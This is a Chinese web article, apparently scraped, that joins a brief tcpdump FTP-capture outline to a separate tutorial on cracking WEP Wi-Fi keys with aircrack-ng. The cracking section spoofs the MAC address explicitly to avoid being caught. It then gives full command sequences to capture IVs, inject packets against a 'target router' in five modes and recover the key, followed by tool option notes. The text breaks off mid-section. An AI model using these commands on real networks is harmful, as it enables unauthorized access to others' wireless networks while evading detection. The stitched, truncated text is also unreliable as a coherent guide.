抓包命令linux 抓包命令行工具无需安装( 二 )


1 ) 安装部署vsftpd服务
2 ) 并启动tcpdump等待抓包
执行tcpdump命令行,添加适当的过滤条件,只抓取访问主机192.168.4.100的21端口的数据通信 ,并转换为ASCII码格式的易读文本 。
3 ) case100作为客户端访问case254服务端
4 ) 查看tcpdump抓包
5 ) 再次使用tcpdump抓包,使用-w选项可以将抓取的数据包另存为文件,方便后期慢慢分析 。
6 ) tcpdump命令的-r选项,可以去读之前抓取的历史数据文件
linux怎么开启抓包tcp 53Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows从Linux 了,另外 Windows下扫描到的 AP 也比 Linux 下少了很多 。其实 Windows并不完整的支持 TCP/IP 协议族,有些协议Windows直接丢弃不用 。网络本来从一开始就是 Unix 的天下,Windows只是在后来加入了网络的功能 。Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:airmon-ng 处理网卡工作模式airodump-ng 抓包aircrack-ng 破解aireplay-ng 发包,干扰另外还要用到以下 linux 命令:ifconfig 查看修改网卡状态和参数macchanger 伪造 MACiwconfig 主要针对无线网卡的工具 (同 ifconfig)iwlist 获取无线网络的更详细信息另外还有其他的 linux 基本命令,我就不提示了 。具体破解步骤:1. 修改无线网卡状态:先 dow2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能3. 修改网卡工作模式:进入Monitor状态 , 会产生一个虚拟的网卡4. 修改无线网卡状态: up5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标6. 监听抓包:生成 .cap 或 .ivs7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等ifconfig -aifconfig -a ath0 upairmon-ng start wifi0 6airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1airodump-ng ath1aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1----------- -2 Crack Mode-----------aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1----------- -3 Crack Mode-----------aireplay-ng -3 -b 目标MAC -h 本机MAC ath1----------- -4 Crack Mode-----------aireplay-ng -4 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1----------- -5 Crack Mode-----------aireplay-ng -5 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1-----------Crack Key-----------aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs—————————————————————————————— 下面详细介绍一下各个命令的基本用法(参照命令的英文说明)1. ifconfig用来配置网卡,我们这里主要用来 禁用和启用 网卡:ifconfig ath0 downifconfig ath0 up禁用一下网卡的目的是为了下一步修改 MAC。2.macchanger用来改变网卡的 MAC 地址 , 具体用法如下:usage: macchanger [options] device-h 显示帮助-V 显示版本-s 显示当前MAC-e 不改变mac,使用硬件厂商写入的MAC-a 自动生成一个同类型的MAC , 同厂商的-A 自动生成一个不同类型的MAC,不同厂商的-r 生成任意MAC-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0。3.airmon-ng启动无线网卡进入 Monitor 模式,useage: airmon-ng startstopcheck interface [channel]startstopcheck启动,停止,检测interface指定无线网卡[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了4.iwconfig专用的无线网卡配置工具 , 用来配置特殊的网络信息,不带参数时显示可用网络 。useage:iwconfig interface [options][essid{NNONOFF}] 指定essid号 开启关闭[nwid{NNonoff}] 指定网络id号 开启关闭[mode {managedad-hoc....}] 指定无线网络工作模式/类型[freq N.NNNN[KMG]] 指定工作频率[channel N] 指定频道[ap {Noffauto}] 指定AP号 关闭/自动[sens N] sens 号[nick N] nick 号[rate {Nautofixed}] 速率控制[rts {Nautofixedoff}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了[frag {Nautofixedoff}] 碎片控制[enc {NNNN-NNNNoff}] 范围[power {period Ntimeout N}] 电源 频率/超时[retry {limit Nlifetime N}] 重试 限次/超时[txpower N{mwdBm}] 功率 毫瓦/分贝[commit] 处理5.iwlist主要用来显示无线网卡的一些附加信息,同上useage: iwlist [interface] optionsscanning 扫描frequency 频率channel 频道bitrate 速率rate 速率encryption 加密key 密钥power 电源txpower 功率ap apaccespoints appeers 直连event 事件6.airodump-ng抓包工具,我最喜欢用的,详细用法如下:usage: airodump-ng options interface[,interface,...]Options:--ivs :仅将抓取信息保存为 .ivs--gpsd :使用 GPSd--write prefix :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分-w :同 --write--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的--update secs :显示更新延迟,没有用过--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了-h :隐藏已知的,配合上面的选项使用-f msecs :跳频时间--berlin secs :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)-r file :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵Filter options:--encrypt suite : 使用密码序列过滤 AP--netmask netmask : 使用掩码过滤 AP--bssid bssid : 使用 bssid 过滤 AP-a : 过滤无关的客户端默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:--channel channels:指定频道--band abg :制定带宽-C frequencies :指定频率MHz--cswitch method : 设置频道交换方式0 : FIFO (default) 先进先出(默认)1 : Round Robin 循环2 : Hop on last 最后一跳-s : 同上--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文7.aireplay-ng

推荐阅读